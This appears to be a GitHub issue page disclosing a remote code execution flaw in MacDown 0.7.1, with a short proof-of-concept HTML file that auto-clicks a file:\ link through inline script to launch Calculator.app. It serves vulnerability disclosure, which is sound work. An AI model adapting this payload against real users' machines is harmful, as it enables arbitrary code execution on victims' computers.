MacDownApp/macdown

Macdown Version 0.7.1 (870) Remote Code Execution

Open

#1050 aperta il 28 gen 2019

Vedi su GitHub
 (7 commenti) (1 reazione) (0 assegnatari)Objective-C (930 fork)batch import
help wantedon hold

Metriche repository

Star
 (7686 star)
Metriche merge PR
 (Nessuna PR mergiata in 30 g)

Descrizione

Macdown Version 0.7.1 (870) Remote Code Execution

Macdown version 0.7.1 (870) is affected by a remote code execution vulnerability. Macdown fails to sanitize input on HTML attributes. Abusing thefile:\\ URI scheme on HTML attributes can result in arbitrary code execution. The attached proof of concept will execute the MacOS Calculator.app when opened inside of Macdown.

PoC (PoC.md):

<!DOCTYPE html>
<html>
<body>

<a href="file:\\\Applications\Calculator.app" id=exploit download>
  <img src="/images/exploit.jpg" alt="exploit" width="104" height="142">
</a>

<script>
(function download() {
    document.getElementById('exploit').click();
})()
</script>

</body>
</html>

Screenshot:

PoC.md.zip

Guida contributor